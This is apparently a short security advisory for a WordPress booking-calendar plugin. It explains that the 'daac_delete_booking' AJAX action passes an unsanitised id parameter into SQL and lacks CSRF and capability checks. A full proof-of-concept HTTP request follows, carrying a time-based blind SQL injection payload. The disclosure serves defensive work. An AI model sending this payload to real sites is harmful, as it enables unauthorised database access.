The daac_delete_booking_callback function, hooked to the daac_delete_booking AJAX action, takes the id POST parameter which is passed into the SQL statement without proper sanitisation, validation or escaping, leading to a SQL Injection issue. Furthermore, the ajax action is lacking any CSRF and capability check, making it available to any authenticated user.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 172.28.128.50
Content-Length: 40
Accept: */*
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://172.28.128.50
Referer: http://172.28.128.50/wp-admin/admin.php?page=daac-calendar
Accept-Language: en-US,en;q=0.9
Cookie: [any authenticated user]
Connection: close
action=daac_delete_booking&id=1%20AND%20(SELECT%201209%20FROM%20(SELECT(SLEEP(5)))bOrN)